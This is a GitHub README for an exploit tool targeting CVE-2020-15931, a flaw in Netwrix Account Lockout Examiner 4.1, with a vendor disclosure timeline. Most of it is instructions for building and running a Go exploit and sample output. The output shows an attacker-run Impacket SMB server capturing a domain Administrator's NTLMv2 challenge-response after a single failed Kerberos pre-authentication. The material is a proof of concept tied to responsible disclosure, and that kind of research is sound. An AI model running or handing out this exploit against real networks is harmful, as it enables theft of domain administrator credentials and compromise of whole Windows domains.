
Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability

Primary LanguageGoMIT LicenseMIT


Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability

Vulnerbility Overview

Netwrix Account Lockout Examiner (ALE) before 5.1 allows an unauthenticated, remote adversary to trigger a connection to an attacker-controlled system and capture the NTLMv1/v2 challenge-response of an account with domain administrator privileges. The domain administrator account would already be configured with the product as required for installation. An adversary can exploit this by generating a single Kerberos Pre-Authentication Failed (Event ID 4771) event on a domain controller.

More details about the vulnerability can be found on the following Blog



The vulnerability was discovered in the wild by Robert Surace (@robsauce) and Daniel Min (@bigb0ss), Optiv Security Consultants while performing a security assessment. Upon identification of CVE-2020-15931, Optiv immediately contacted Netwrix to disclose the identified flaw responsibly.

Vulnerability Disclosure Timeline

  • June 09, 2020 – Vulnerability discovered by Optiv
  • June 15, 2020 – Disclosed by Optiv to vendor
  • July 14, 2020 – Vendor acknowledged the issue and agreed to release the fixed version
  • July 23, 2020 – Disclosed to CNA (MITRE Corporation)
  • July 24, 2020 – Vendor released the fixed version of the Netwrix Account Lockout Examiner 5.1
  • July 24, 2020 – CVE-2020-15931 assigned by CNA (MITRE Corporation)
  • August 13, 2020 – Disclosed to the public
  • October 30, 2020 - Base Score 7.5 High assigned by NVD (National Vulnerability Database)

Exploit Script


The exploit script was developed in golang. Install the following dependencies:

go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config

It also utilizes the smbserver.py from Impacket.

pip install impacket

Finally, download the exploit script and build it.

git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go


$  ./cve-2020-15931

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

    -d            Domain name
    -dc           Domain controller 
    -u            Valid username 
    -h            Print this help menu

    ./cve-2020-15931 -d target.com -dc -u jsmith


(Note: At the time of writing, this attack can only be identified via a blind-based attack. This is because it is difficult to determine if the target organization is using Netwrix Account Lockout Examiner on their network to audit account authentications or not.)

$ ./cve-2020-15931 -d bosslab.com -dc -u b0ss1

     _______      ________    ___   ___ ___   ___        __ _____ ___ ____  __ 
    / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | ____/ _ \___ \/_ |
   | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
   | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
   | |____   \  /  | |____    / /_| |_| / /_| |_| |      | |___) | / /___) || |
    \_____|   \/   |______|  |____|\___/____|\___/       |_|____/ /_/|____/ |_|
                                                         [robSauce & bigb0ss]  v1.0

   [+] Netwrix Account Lockout Examiner 4.1 Exploit Script

[+] DC:
[+] Domain: 	bosslab.com
[+] Username: 	b0ss1
[+] Password: 	wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...

Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (,59264)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (,59264)
[*] Remaining connections []


Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client